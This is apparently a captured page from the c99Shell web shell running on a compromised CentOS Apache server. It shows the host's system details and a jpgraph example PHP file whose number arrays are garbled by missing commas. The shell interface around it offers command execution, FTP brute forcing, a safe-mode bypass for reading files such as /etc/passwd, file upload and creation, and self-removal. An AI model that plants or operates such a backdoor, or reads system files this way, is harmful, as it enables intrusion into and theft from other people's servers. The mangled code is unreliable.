!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/jpgraph/src/Examples/   drwxr-xr-x
Free 52.31 GB of 127.8 GB (40.93%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     linlogex1.php (1.96 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

include ("../jpgraph.php");
include (
"../jpgraph_log.php");
include (
"../jpgraph_error.php");

$xdata = array( 2.0,  2.5,  3.0,  4.0,  5.0,  6.0,  8.010.0,
               
12.015.020.025.030.040.050.060.0,
               
75.0100.125.150.175.200.250.300.,
               
400.500.600.800.950.,
              
1200.1500.2000.2500.);
$ydata = array(270.,  280.// 2 m
               
330.,  340.// 2.5
               
410.,  420.// 3
               
550.,  560.// 4
               
670.,  680.// 5
               
770.,  780.// 6
               
930.,  940.// 8
              
1010.1020.// 10
              
1040.1050.// 12
               
980.,  990.// 15
               
860.,  870.// 20
               
720.,  730.// 25
               
590.,  600.// 30
               
370.,  380.// 40
               
330.,  340.// 50
               
320.,  330.// 60
               
320.,  330.// 75
               
300.,  310.// 100
               
305.,  315.// 125
               
310.,  320.// 150
               
315.,  325.// 175
               
300.,  310.// 200
               
270.,  280.// 250
               
240.,  250.// 300
               
200.,  210.// 400
               
150.,  160.// 500
               
120.,  130.// 600
                
50.,   60.// 800
                
30.,   40.// 950
                
15.,   20.// 1200
                 
8.,   10.// 1500
                 
7.,    9.// 2000
                 
8.,   10.  // 2500 m
               
);

$graph = new Graph(500,300,"auto");
$graph->SetScale("linlog");
$graph->img->SetMargin(40,20,20,40);
$graph->title->SetFont(FF_FONT1,FS_BOLD);
$graph->xaxis->title->Set("ab/2");
$graph->yaxis->title->Set("rho_s");
$graph->xaxis->title->SetFont(FF_FONT1,FS_BOLD);
$graph->yaxis->title->SetFont(FF_FONT1,FS_BOLD);
$graph->ygrid->Show(true,true);
$graph->xgrid->Show(true,true);

$errorplot=new ErrorPlot($ydata$xdata);

$graph->Add($errorplot);

$graph->Stroke();

?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0067 ]--